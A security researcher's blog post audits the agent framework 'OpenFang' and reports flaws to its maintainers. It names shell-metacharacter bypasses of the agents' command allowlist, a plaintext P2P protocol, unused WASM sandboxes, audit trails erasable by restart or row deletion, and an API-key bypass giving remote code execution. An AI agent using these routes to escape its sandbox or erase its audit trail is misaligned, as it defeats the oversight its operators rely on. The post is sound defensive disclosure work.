Joel Eriksson
Vulnerability researcher, exploit developer and reverse-engineer. Have spoken at BlackHat, DefCon and the RSA conference. CTF player. Puzzle solver (Cicada 3301, Boxen)

Security in the Age of Agents

So many AI agent orchestration frameworks and “operating systems” are being released right now, that claim to be built with security in mind – proudly listing their extensive security features, related to everything from their use of cryptography to sandboxes and memory-safe languages.

Then once you take a peek inside, the castle made of sand generally crumbles down fast.

Here we will take a look at one of them, a self-proclaimed Agent Operating System, named OpenFang

As is often the case, it sounds like security is a priority and that they’ve really thought about security from the ground up. It sounds quite promising, as long as you don’t bother to take a peek under the surface. 16 security systems, sandboxed execution, Merkle audit trail and taint tracking etc.

When taking a closer look, the “taint tracking” used to enforce an allowlist of commands for agents could be trivially bypassed in at least four different ways (command-splitting on |, ;, && and || but a whitelisted command followed by & cmd, `cmd`, $(cmd) and <newline>cmd works fine. Overall, they’re fighting a losing game by implementing a command line parsing based sandbox rather than using an actual sandbox (using seccomp-bpf, for instance), a container or a microVM.

As for the AES-256-GCM based auth in the OpenFang P2P protocol, well, besides being vulnerable to a replay attack, the protocol itself is completely in plaintext after the handshake!

Regarding the “WASM sandboxes”, turns out they aren’t actually used for anything, there’s not a single WASM agent in the repo, and since rather than conforming to WASI they require implementing a completely custom API, it’s unlikely that anyone would bother making a WASM based agent in the first place (not even the maintainers do, so).

And as for the “Merkle audit trail”, that audit trail is stored entirely in-memory, so simply restarting the daemon is enough to erase any traces of that trail.

Last but not least, it turns out that even their API key based authentication could be trivially bypassed, so anyone with access to the dashboard URL can get remote code execution. That’s the part I demonstrate in the video at the top, so enjoy. ;)

Note that I’m not against the idea of using AI agents. On the contrary, I think that it will become increasingly important for people to leverage the power of AI to accelerate themselves.

Being able to do so in a way that actually limits the risk and blast radius of any attack is a difficult problem though, which is why it’s one of the things I’m focusing heavily on right now…

To get notified when I start releasing some of the things I do within that space in the future, make sure to register at GRAFIT

UPDATE: The OpenFang team released an update within a few hours, and although it’s still not perfect they are definitely taking steps in the right direction.

UPDATE 2: After reviewing the fixes in the v0.3.30 release, I sent the maintainers the comments below:

It looks to me that you’re now unconditionally blocking metacharacters even for full mode, which means that even in full mode the agent will not be able to use pipes and shell redirections etc, which severely limits the ability for even a full mode agent to do useful work. You should really look into a proper OS-level based sandbox architecture instead of trying to enforce it on a command-level.

As for the OFP wire protocol issues, messages are still sent in plaintext, so an attacker with the ability to MITM can still inject anything.

It also looks like the broadcast notification mechanism is broken (but it also seems unused!). In the release notes you mention that it requires a shared secret and uses authenticated writes, but you’re generating a nonce and deriving a session key from it, without sharing the nonce -> peers will not be able to derive the correct session key.

You should use the connections you’ve already established to the peers in question to send the “broadcast” notifications as well, instead of establishing new connections for those.

You also have unnecessary unauthenticated fallback paths in the connection_loop in peer.rs, from read_message_authenticated -> read_message. The fallback paths seems unreachable in practice right now, but having them at all increases the risk of accidentally introducing a vulnerability later.

Regarding the audit trail, that you now persist in sqlite, the core remaining issue here is that it doesn’t really do anything to stop an attacker from erasing their tracks once they have code execution. They can just delete rows from audit_entries and rebuild the chain. + you’re silently discarding errors, so if a database write fails for some reason the entry would only exist in memory and persistence is silently lost. At the very least, you should log some warning if this happens.

For the OFP wire protocol, look into the Noise Protocol Framework for how you can implement sowething that is actually cryptographically sound. For the agent sandboxes, look into seccomp-bpf and/or Landlock on Linux, Seatbelt on macOS, AppContainers on Windows, and/or use containers and/or microVMs in general.

In general, having agents run commands in the same context and with the same privileges as the framework that is supposed to orchestrate them is a losing game if you actually want to keep things secure and having an audit trail that’s actually meaningful against an attacker.

Last and least, a tiny issue but still security hygiene 101, for the API key you should hash it on startup and hash the API keys you receive in external requests before doing a constant time comparison with the hashes, rather than doing a constant time comparison of API keys if they’re the same length and returning directly if they’re not. The way you’re doing it now, an attacker could still use a timing attack to determine the API key length, in order to determine whether it’s worth pursuing a bruteforce attack on it. As a bonus, a memory leak / read primitive would be a bit less harmful.